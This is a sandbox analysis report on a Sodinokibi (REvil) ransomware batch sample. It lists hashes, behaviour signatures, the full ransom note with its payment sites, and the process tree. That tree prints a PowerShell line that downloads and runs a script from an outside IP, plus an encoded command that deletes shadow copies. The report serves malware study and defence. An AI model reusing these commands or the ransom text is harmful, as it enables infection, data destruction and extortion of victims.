Overview

overview

10

Static

static

ba14ab3ed6...b9.bat

windows7_x64

10

ba14ab3ed6...b9.bat

windows10_x64

10

Analysis

  • max time kernel
    138s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    23-06-2020 03:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ba14ab3ed6e7b7ab08b7add2a00958b9.bat

  • Size

    216B

  • MD5

    be80d5e6a14a15ec34832dbba9abf139

  • SHA1

    3f56abfb2adcb556bdabeac9b92de7520a81ccbf

  • SHA256

    c21697f0b7e8c644cf9bc515972a1ec3b8c3c357c123dd8b06c1fa1f93e6b88b

  • SHA512

    20f8041a4f2f000a47bb0f9fb7c4af1b8f4842c6706252ccc4abda665be8f7ae22b1a6d8385a19bc1d0f1e006ffb667334d127cbd70bf66a58e146b039dcd73d

Score
10/10
ransomwarepersistencesodinokibi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9

Extracted

Path

C:\w97n39vc9-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension w97n39vc9. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DF2449B399E6D2ED 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/DF2449B399E6D2ED Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 0b/5dTiS4+60LYYlikfMALXOou5QFh9oNGAY27GSDdu3GjS30URW0ZKtHHGlG2fm 9mu2TCk+2m4HfVE2vYLBz949qVViGzteRXz5crUrOomUsnbSEVw9PopCYthKyJW9 QrWJzgZ7frnkdCglOa99xJzHSyC/cfWeCWh3kSVsqQdYEHycR7Dqp1s7uvNoTjLK tmid1xI3vMeqkCRnlaKqQFbJqnQelTilRFlDquD6LcJ7GRxA7xB1WUj2JCm28MoL d7zxGUm9M0mv/M5C0EiUJ7PEOEaL73nlh39WIKaCaAA8IToqajjoFM1qp20lSTNc 4TnyZKADvD/OWi3wNUidGZF7O6jEy2mc/l1LOeR/cKk6kznzmtKGk6+44LIAenBt l2XJAljLL7iEdsVbKXnSTUV9HREMMWWvHO6fEVIjoKS7gc8lA7OMKlF9Ir4VHL+b Ppu7M2+n7saXKXBOf4FVLeMxbIOxLWpO7IMib9tElLJgOBVhX9hJmsF5yf7UkXWZ u6hr6kUFc5nyhpogS2XIv/3nOEFbtpg0QC13vICkVR0QNX6htDp+EuIKWSRDYYqH TrISysy9YOGJ1qR2FkDcGQk11udUxgSRh4K0UGcafH/rey/ITIfeYuqsTCypQjrH Z5ej/9HZCwtZfPkLUaQMrUMmxCr+AflLkt9SQWTJkWj5P+oFZwNGAGKUUMYutRaB f6Wcmza+Vf7b60Yw2K9eg087cKwPnms8fQxhYoU+taZ0PZJTYQQ/xmiFo+1lqfFg oqK9KKrURvTSBqhXtosauLXTOJz+TwTM7nR7xnSa7jikcodQUauPi4UZEFTmFpRJ 3CcEX3+L3QEzvHlJKF9KXbmy19Ci9iFTIRFwfNXRe8GFJy/h3b4jfkZXNLzdC/S7 tOC/y2n7o0IkxFrawravS5htMD/YMUPhtHwrraFV0ye9zOyPQDsqwLbkghwEhNWv 7ujzNlUTitjdYYvhqvpaHOQ8lZHv+iURLtpGAEPB7LFQ+Npm76XtkQPKh4ShPjQy Nukyo7cI2bFi3yiUoVsbj4G6OssnriySdqhW4gFku06MQEeUNrwCrJgkH72HJvS3 jRSJH5r2SBlOezVOHRbljwwFtg3lJvhyT2DiA0Z94imsVEyvtuj+6DE7Hn0VvUy6 DGWfg5lAMjwZ0MqxGuVGMx/040DQCpf35OmS/F0MePActoZkwOy0cpEe4J8dqRVD GIpLbi8FdHoR+fHTt0Wj8bXESF2TqDvIPs0wm/UFhWXEtovKbPgzOsYqm8GqUZT+ fW/mj7n4QsRqsZnpI0BADeYLhZJIvmrlkNUX05ubFmVM8HsJK78= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DF2449B399E6D2ED

http://decryptor.cc/DF2449B399E6D2ED

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ba14ab3ed6e7b7ab08b7add2a00958b9.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9');Invoke-PYHZVCNXW;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Suspicious use of AdjustPrivilegeToken
      PID:1480
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1376
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1608

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit

  • memory/1376-3-0x0000000000000000-mapping.dmp

    Download

  • memory/1480-0-0x0000000000000000-mapping.dmp

    Download

  • memory/1480-14-0x000000000905D000-0x00000000090CA000-memory.dmp

    Filesize

    436KB

    Download